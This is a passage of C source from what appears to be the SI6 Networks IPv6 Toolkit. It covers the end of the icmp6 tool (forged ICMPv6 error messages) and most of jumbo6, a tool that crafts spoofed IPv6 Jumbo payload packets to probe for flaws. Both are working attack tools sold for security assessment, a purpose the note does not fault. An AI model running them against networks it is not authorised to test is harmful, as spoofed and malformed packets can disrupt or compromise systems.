ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + linkhsize); fptrend = fptr + linkhsize+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - linkhsize); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } /* Sending fragments */ } /* Sending fragmented datagram */ peerport++; }while(peerport<=peerporth); targetport++; }while(targetport<=targetporth); } /* * Function: usage() * * Prints the syntax of the icmp6 tool */ void usage(void){ puts("usage: icmp6 [-i INTERFACE] [-s SRC_ADDR[/LEN]] [-d DST_ADDR]\n" " [-S LINK_SRC_ADDR] [-D LINK-DST-ADDR] [-c HOP_LIMIT] [-y FRAG_SIZE]\n" " [-u DST_OPT_HDR_SIZE] [-U DST_OPT_U_HDR_SIZE] [-H HBH_OPT_HDR_SIZE]\n" " [-t TYPE[:CODE] | -e CODE | -A CODE -V CODE -R CODE] [-r TARGET_ADDR]\n" " [-x PEER_ADDR] [-c HOP_LIMIT] [-m MTU] [-O POINTER] [-p PAYLOAD_TYPE]\n" " [-P PAYLOAD_SIZE] [-n] [-a SRC_PORTL[:SRC_PORTH]]\n" " [-o DST_PORTL[:DST_PORTH]] [-X TCP_FLAGS] [-q TCP_SEQ] [-Q TCP_ACK]\n" " [-V TCP_URP] [-w TCP_WIN] [-M] [-j PREFIX[/LEN]] [-k PREFIX[/LEN]]\n" " [-J LINK_ADDR] [-K LINK_ADDR] [-b PREFIX[/LEN]] [-g PREFIX[/LEN]]\n" " [-B LINK_ADDR] [-G LINK_ADDR] [-f] [-L | -l] [-z] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the icmp6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts("icmp6: Security assessment tool for attack vectors based on ICMPv6 error messages\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -c IPv6 Hop Limit\n" " --frag-hdr. -y Fragment Header\n" " --dst-opt-hdr, -u Destination Options Header (Fragmentable Part)\n" " --dst-opt-u-hdr, -U Destination Options Header (Unfragmentable Part)\n" " --hbh-opt-hdr, -H Hop by Hop Options Header\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --icmp6, -t ICMPv6 Type:Code\n" " --icmp6-dest-unreach, -e ICMPv6 Destination Unreachable\n" " --icmp6-packet-too-big, -E ICMPv6 Packet Too Big\n" " --icmp6-time-exceeded, -A ICMPv6 Time Exceeeded\n" " --icmp6-param-problem, -R ICMPv6 Parameter Problem\n" " --mtu, -m Next-Hop MTU (ICMPv6 Packet Too Big)\n" " --pointer, -O Pointer (ICMPv6 Parameter Problem\n" " --payload-type, -p Redirected Header Payload Type\n" " --payload-size, -P Redirected Header Payload Size\n" " --no-payload, -n Do not include a Redirected Header Option\n" " --ipv6-hlim, -C ICMPv6 Payload's Hop Limit\n" " --target-addr, -r ICMPv6 Payload's IPv6 Source Address\n" " --peer-addr, -x ICMPv6 Payload's IPv6 Destination Address\n" " --target-port, -o ICMPv6 Payload's Source Port\n" " --peer-port, -a ICMPv6 Payload's Destination Port\n" " --tcp-flags, -X ICMPv6 Payload's TCP Flags\n" " --tcp-seq, -q ICMPv6 Payload's TCP SEQ Number\n" " --tcp-ack, -Q ICMPv6 Payload's TCP ACK Number\n" " --tcp-urg, -V ICMPv6 Payload's TCP URG Pointer\n" " --tcp-win, -w ICMPv6 Payload's TCP Window\n" " --resp-mcast, -M Respond to Multicast Packets\n" " --block-src, -j Block IPv6 Source Address prefix\n" " --block-dst, -k Block IPv6 Destination Address prefix\n" " --block-link-src, -J Block Ethernet Source Address\n" " --block-link-dst, -K Block Ethernet Destination Address\n" " --accept-src, -b Accept IPv6 Source Addres prefix\n" " --accept-dst, -g Accept IPv6 Destination Address prefix\n" " --accept-link-src, -B Accept Ethernet Source Address\n" " --accept-link-dst, -G Accept Ethernet Destination Address\n" " --sanity-filters, -f Add sanity filters\n" " --listen, -L Listen to incoming traffic\n" " --loop, -l Send periodic ICMPv6 error messages\n" " --sleep, -z Pause between sending ICMPv6 error messages\n" " --help, -h Print help for the icmp6 tool\n" " --verbose, -v Be verbose\n" "\n" " Programmed by Fernando Gont for SI6 Networks \n" " Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ puts( "icmp6: Security ssessment tool for attack vectors based on ICMPv6 error messages\n"); if(idata->type == DLT_EN10MB && idata->flags != IFACE_LOOPBACK){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!idata->hsrcaddr_f)?" (randomized)":"")); /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, \ ((!idata->hdstaddr_f)?" (automatically selected)":"")); } } if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (randomized)":"")); if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (randomized)"); for(i=0; idstaddr_f){ printf("Payload Type: IPv6/TCP%s\n", (rhdefault_f?" (default)":"")); } else if(rhudp_f && idata->dstaddr_f){ puts("Payload Type: IPv6/UDP"); } else if(rhicmp6_f && idata->dstaddr_f){ puts("Payload Type: IPv6/ICMPv6 Echo Request"); } if(inet_ntop(AF_INET6, &targetaddr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Redirected Address to presentation format"); exit(EXIT_FAILURE); } if(idata->dstaddr_f){ printf("Source Address: %s%s\n", pv6addr, ((!targetaddr_f)?" (automatically-selected)":"")); } if(inet_ntop(AF_INET6, &peeraddr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Redirect Target Address to presentation format"); exit(EXIT_FAILURE); } if(idata->dstaddr_f){ printf("Destination Address: %s%s\n", pv6addr, ((!peeraddr_f)?" (randomized)":"")); } printf("Hop Limit: %u%s\n", ip6hoplimit, (ip6hoplimit_f)?"":" (randomized)"); if((rhtcp_f || rhdefault_f) && idata->dstaddr_f){ if(targetporth_f){ printf("Source Port: %u-%u\t", targetportl, targetporth); } else{ printf("Source Port: %u%s\t", targetportl, (targetportl_f?"":" (randomized)")); } if(peerporth_f){ printf("Destination Port: %u-%u\t", peerportl, peerporth); } else{ printf("Destination Port: %u%s\n", peerportl, (peerportl_f?"":" (randomized)")); } printf("SEQ Number: %u%s\tACK Number: %u%s\n", tcpseq, (tcpseq_f?"":" (randomized)"), \ tcpack, (tcpack_f?"":" (randomized)")); printf("Flags: %s%s%s%s%s%s%s%s\t", ((tcpflags & TH_FIN)?"F":""), ((tcpflags & TH_SYN)?"S":""), \ ((tcpflags & TH_RST)?"R":""), ((tcpflags & TH_PUSH)?"P":""),\ ((tcpflags & TH_ACK)?"A":""), ((tcpflags & TH_URG)?"U":""),\ ((!tcpflags)?"none":""), ((!tcpflags_f)?" (default)":"")); printf("Window: %u%s\tURG Pointer: %u%s\n", tcpwin, (tcpwin_f?"":" (randomized)"), \ tcpurg, (tcpurg_f?"":" (default)")); } else if(rhudp_f && idata->dstaddr_f){ if(targetporth_f){ printf("Source Port: %u-%u\t", targetportl, targetporth); } else{ printf("Source Port: %u%s\t", targetportl, (targetportl_f?"":" (randomized)")); } if(peerporth_f){ printf("Destination Port: %u-%u\t", peerportl, peerporth); } else{ printf("Destination Port: %u%s\t", peerportl, (peerportl_f?"":" (randomized)")); } } else if(rhicmp6_f && idata->dstaddr_f){ printf("Identifier: %u%s\tSequence Number: %u%s\n", icmp6id, (icmp6id_f?"":" (randomized)"), \ icmp6seq, (icmp6seq_f?"":" (randomized)")); } } ipv6toolkit-1.5.1/tools/icmp6.h000066400000000000000000000000561223702747200163460ustar00rootroot00000000000000/* * Header file for the icmp6 tool * */ ipv6toolkit-1.5.1/tools/ipv6toolkit.h000066400000000000000000000012661223702747200176260ustar00rootroot00000000000000#define SI6_TOOLKIT "SI6 Networks' IPv6 Toolkit v1.5.1" #define MAX_CMDLINE_OPT_LEN 40 #define DATE_STR_LEN 40 /* XXX Most of these constants should be moved to libipv6.h when the library is employed by all tools. */ /* Constants used with the libpcap functions */ #define PCAP_SNAP_LEN 65535 #define PCAP_PROMISC 1 #define PCAP_OPT 1 #ifndef PCAP_NETMASK_UNKNOWN #define PCAP_NETMASK_UNKNOWN 0xffffffff #endif #if defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) #define PCAP_TIMEOUT 1 #else #define PCAP_TIMEOUT 0 #endif /* Constants to signal special interface types */ #define IFACE_LOOPBACK 1 #define IFACE_TUNNEL 2 ipv6toolkit-1.5.1/tools/jumbo6.c000066400000000000000000001017301223702747200165260ustar00rootroot00000000000000/* * jumbo6: A security assessment tool that exploits potential flaws in the * processing of IPv6 Jumbo payloads * * Copyright (C) 2011-2013 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: make jumbo6 * * The libpcap library must be previously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __linux__ #include #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) #include #endif #include "jumbo6.h" #include "libipv6.h" #include "ipv6toolkit.h" /* Function prototypes */ void init_packet_data(struct iface_data *); int send_packet(struct iface_data *, struct pcap_pkthdr *, const u_char *); void print_icmp6_echo(struct iface_data *, struct pcap_pkthdr *, const u_char *); void print_icmp6_error(struct iface_data *, struct pcap_pkthdr *, const u_char *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); int valid_icmp6_response(struct iface_data *, struct pcap_pkthdr *, const u_char *); /* Used for router discovery */ struct prefix_entry *prefix_ols[MAX_PREFIXES_ONLINK], *prefix_acs[MAX_PREFIXES_AUTO]; struct prefix_entry *prefix_local[MAX_LOCAL_ADDRESSES]; struct in6_addr randprefix; unsigned char randpreflen; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct ether_header *ethernet; struct nd_opt_tlla *tllaopt; struct in6_addr targetaddr; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int sources, nsources, ports, nports, nsleep; u_int16_t mask, ip6length; u_int32_t jplength, *jplengthptr, *fjplengthptr, icmp6psize; u_int8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char floodt_f=0; unsigned char listen_f=0, accepted_f=0, loop_f=0, sleep_f=0, localaddr_f=0; unsigned char hoplimit_f=0, ip6length_f=0, jplength_f=0, icmp6psize_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=0; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize, max_packet_size, linkhsize; unsigned char *prev_nh, *startoffragment; struct iface_data idata; int main(int argc, char **argv){ extern char *optarg; char *endptr; /* Used by strtoul() */ fd_set sset, rset; struct timeval timeout; int r, sel; time_t curtime, start, lastecho=0; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"ipv6-length", required_argument, 0, 'q'}, {"jumbo-length", required_argument, 0, 'Q'}, {"payload-size", required_argument, 0, 'P'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= "i:s:d:A:u:U:H:y:S:D:q:Q:P:lz:Lvh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=64+random()%180; init_iface_data(&idata); while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if(idata.srcaddr_f){ puts("Error: Multiple '-s' options have been specified"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ if( inet_pton(AF_INET6, optarg, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen <= 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; fragh_f= 1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'P': /* Payload Size*/ icmp6psize= atoi(optarg); icmp6psize= (icmp6psize<<2) >> 2; /* The Redirected Header has a granularity of 8 bytes */ icmp6psize_f= 1; break; case 'q': /* IPv6 Payload Length */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ ip6length = ul_res; ip6length_f=1; } break; case 'Q': /* Jumbo Payload Length */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ jplength = ul_res; jplength_f=1; } break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("jumbo6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ if(idata.dstaddr_f && IN6_IS_ADDR_LINKLOCAL(&(idata.dstaddr))){ puts("Must specify a network interface for link-local destinations"); exit(EXIT_FAILURE); } else if(idata.listen_f){ puts("Must specify a network interface when employing the 'listenging' mode"); exit(EXIT_FAILURE); } } if(listen_f && loop_f){ puts("'Error: listen' mode and 'loop' mode are incompatible"); exit(EXIT_FAILURE); } if(!idata.dstaddr_f && !listen_f){ /* Must specify IPv6 Destination Address if listening mode not used */ puts("IPv6 Destination Address not specified (and listening mode not selected)"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); srandom(time(NULL)); if((idata.ip6_local_flag && idata.ip6_global_flag) && !idata.srcaddr_f) localaddr_f=1; if(!idata.ether_flag){ randomize_ether_addr(&idata.ether); idata.ether_flag=1; } if(!idata.ip6_local_flag){ ether_to_ipv6_linklocal(&idata.ether, &idata.ip6_local); } if(!sleep_f) nsleep=QUERY_TIMEOUT; if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(fragh_f) max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; else max_packet_size = ETH_DATA_LEN; if(idata.verbose_f){ print_attack_info(&idata); } /* Set filter for receiving Neighbor Solicitations, ICMPv6 Echo Responses, and ICMPv6 Parameter Problem */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_NS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Fire a TCP segment if an IPv6 Destination Address was specified */ if(idata.dstaddr_f){ if( (idata.fd= pcap_fileno(idata.pfd)) == -1){ puts("Error obtaining descriptor number for pcap_t"); exit(EXIT_FAILURE); } FD_ZERO(&sset); FD_SET(idata.fd, &sset); start= time(NULL); while(1){ curtime=time(NULL); if(!loop_f && (curtime - start) >= QUERY_TIMEOUT){ break; } if((curtime - lastecho) >= nsleep){ lastecho=curtime; puts("Sending ICMPv6 Echo Request....\n"); if(send_packet(&idata, NULL, NULL) == -1){ puts("Error sending packet"); exit(EXIT_FAILURE); } } rset= sset; timeout.tv_usec=0; timeout.tv_sec= nsleep; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } if(sel == 0) continue; /* Read a packet (Echo Reply, Neighbor Solicitation, or ICMPv6 Error */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (ETHER_HDR_LEN + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ if(pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(!localaddr_f && is_eq_in6_addr(&(pkt_ns->nd_ns_target), &idata.srcaddr)){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if( (pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY) || (pkt_icmp6->icmp6_type == ICMP6_PARAM_PROB)){ if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; /* Do a preliminar validation check on the ICMPv6 packet (packet size, Source Address, and Destination Address). */ if(!valid_icmp6_response(&idata, pkthdr, pktdata)){ continue; } switch(pkt_icmp6->icmp6_type){ case ICMP6_ECHO_REPLY: print_icmp6_echo(&idata, pkthdr, pktdata); break; case ICMP6_PARAM_PROB: print_icmp6_error(&idata, pkthdr, pktdata); break; } } } } exit(EXIT_SUCCESS); } if(!idata.dstaddr_f){ puts("Error: Nothing to send! (Destination Address left unspecified)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: print_icmp6_info() * * Print information about a received ICMPv6 Echo Response packet */ void print_icmp6_echo(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata){ struct ip6_hdr *pkt_ipv6; pkt_ipv6 = (struct ip6_hdr *) (pktdata + idata->linkhsize); if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } printf("Response from %s\n", pv6addr); } /* * Function: print_icmp6_error() * * Print information about a received ICMPv6 error message */ void print_icmp6_error(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata){ struct ip6_hdr *pkt_ipv6; struct icmp6_hdr *pkt_icmp6; pkt_ipv6 = (struct ip6_hdr *) (pktdata + idata->linkhsize); pkt_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_ipv6 + sizeof(struct ip6_hdr)); if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } printf("Response from %s: ICMPv6 Parameter Problem ", pv6addr); switch(pkt_icmp6->icmp6_code){ case ICMP6_PARAMPROB_HEADER: printf("Code 0 (Erroneous Header field), Pointer: %lu\n", (LUI) ntohl(pkt_icmp6->icmp6_pptr)); break; case ICMP6_PARAMPROB_NEXTHEADER: printf("Code 1 (Unrecognized Next Header type), Pointer: %lu\n", (LUI) ntohl(pkt_icmp6->icmp6_pptr)); break; case ICMP6_PARAMPROB_OPTION: printf("Unrecognized IPv6 option), Pointer: %lu\n", (LUI) 